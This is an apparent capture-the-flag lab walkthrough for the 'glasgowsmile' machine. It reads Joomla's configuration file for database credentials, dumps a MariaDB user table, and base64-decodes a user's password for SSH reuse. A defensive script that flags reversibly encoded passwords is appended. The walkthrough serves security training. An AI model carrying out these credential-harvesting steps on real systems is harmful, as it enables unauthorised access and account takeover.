Joomla Configurations


Checking the configuration of the target Joomla instance after manual enumeration of the glasgowsmile host.

www-data@glasgowsmile:/var/www/html/joomla$ cat /var/www/html/joomla/configuration.php
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'Joker';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'joomla';
	public $password = 'babyjoker';
	public $db = 'joomla_db';
	public $dbprefix = 'jnqcu_';
	public $live_site = '';
	public $secret = 'fNRyp6KO51013435';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '';
	public $ftp_port = '';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = 'admin@joker';
	public $fromname = 'Joker';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/joomla/administrator/logs';
	public $tmp_path = '/var/www/html/joomla/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
	public $shared_session = '0';

DB credential identified: joomla:babyjoker. This was flagged by PEAS as well.

MySQL


www-data@glasgowsmile:/var/www/html/joomla$ mysql -ujoomla -pbabyjoker
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3622
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 

Session established.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| batjoke            |
| information_schema |
| joomla_db          |
| mysql              |
| performance_schema |
+--------------------+
5 rows in set (0.002 sec)

2 non-default DBs: batjoke and joomla_db. Nothing notable in the joomla_db DB.

batjoke DB


MariaDB [(none)]> SELECT table_name FROM information_schema.tables WHERE table_schema="batjoke";
 
+------------+
| table_name |
+------------+
| equipment  |
| taskforce  |
+------------+
2 rows in set (0.000 sec)

2 tables: equipment and taskforce.

batjoke.equipment Table


MariaDB [(none)]> SELECT * FROM batjoke.equipment;
Empty set (0.001 sec)

The batjoke.equipment table is empty.

batjoke.taskforce Table


MariaDB [(none)]> SELECT * FROM batjoke.taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.001 sec)

A total of 7 credentials identified in the batjoke.taskforce table. rob is a valid system user. Passwords appear to be base64-encoded.

Decoding

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d
???AllIHaveAreNegativeThoughts???

Decoded password of the rob user is ???AllIHaveAreNegativeThoughts??? Testing it against the target SSH server.
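
The pswd column above holds base64, which is an encoding rather than a hash, so read access to the table is enough to recover every password. The following is an added example, not part of the original write-up: a defensive audit that flags such values without printing what they decode to. The classify and audit helper names and the bcrypt-shaped value are constructed for illustration; the two base64 values are copied from the taskforce table.

```python
import base64
import binascii
import re

# Prefixes of common salted password-hash formats (modular crypt style).
HASH_RE = re.compile(r"^\$(2[aby]|argon2(id|i|d)|5|6|y)\$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def classify(value):
    """Return 'hash', 'base64-plaintext' or 'unknown' for a stored credential."""
    if HASH_RE.match(value):
        return "hash"
    if len(value) % 4 == 0 and B64_RE.match(value):
        try:
            decoded = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            return "unknown"
        # Printable ASCII after decoding means the column stores reversible text.
        if decoded and all(32 <= b < 127 for b in decoded):
            return "base64-plaintext"
    return "unknown"


def audit(rows):
    """rows: iterable of (name, stored_value); returns {name: classification}."""
    return {name: classify(value) for name, value in rows}


# Two stored values from the taskforce table above, plus a constructed
# bcrypt-shaped placeholder (not a real hash) for contrast.
SAMPLE_ROWS = [
    ("Bane", "YmFuZWlzaGVyZQ=="),
    ("rob", "Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/"),
    ("constructed_user", "$2y$10$" + "A" * 53),
]

if __name__ == "__main__":
    for name, verdict in audit(SAMPLE_ROWS).items():
        print(f"{name}: {verdict}")
```

Any row reported as base64-plaintext should be treated as a stored cleartext password: rotate it and migrate the column to a salted password hash.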